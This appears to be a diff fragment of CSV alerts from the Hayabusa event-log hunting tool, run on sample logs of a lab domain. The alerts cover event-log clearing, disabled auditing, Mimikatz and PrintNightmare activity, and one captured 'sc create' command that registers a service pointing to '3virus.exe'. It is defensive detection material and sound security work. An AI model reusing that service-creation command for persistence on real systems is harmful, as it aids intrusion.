+2021-10-26 03:11:10.434 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.450 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.497 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.528 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.747 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.763 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.778 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.794 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.809 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.856 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.934 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.997 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.028 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.091 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.106 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.184 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.200 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.216 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.247 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.341 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.388 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.403 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.450 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.559 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.575 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.622 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.700 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.747 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.778 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.825 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.841 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.856 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.872 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.888 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.903 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.997 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:12.059 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:12.075 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:12.106 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:12.153 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:12.184 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:12.247 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:21:02.504 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Audit policy enumerated.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 05:17:07.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc create hacker-testl3 binPath=""3virus.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x64c | User: admmig | LID: 0x123550",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service created (command).evtx
+2021-10-27 19:09:16.280 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:12:47.151 +09:00,fs03vuln.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
+2021-10-27 19:12:47.229 +09:00,fs03vuln.offsec.lan,5142,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx"
+2021-10-27 19:12:47.323 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,302,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,849,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
+2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,301,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx"
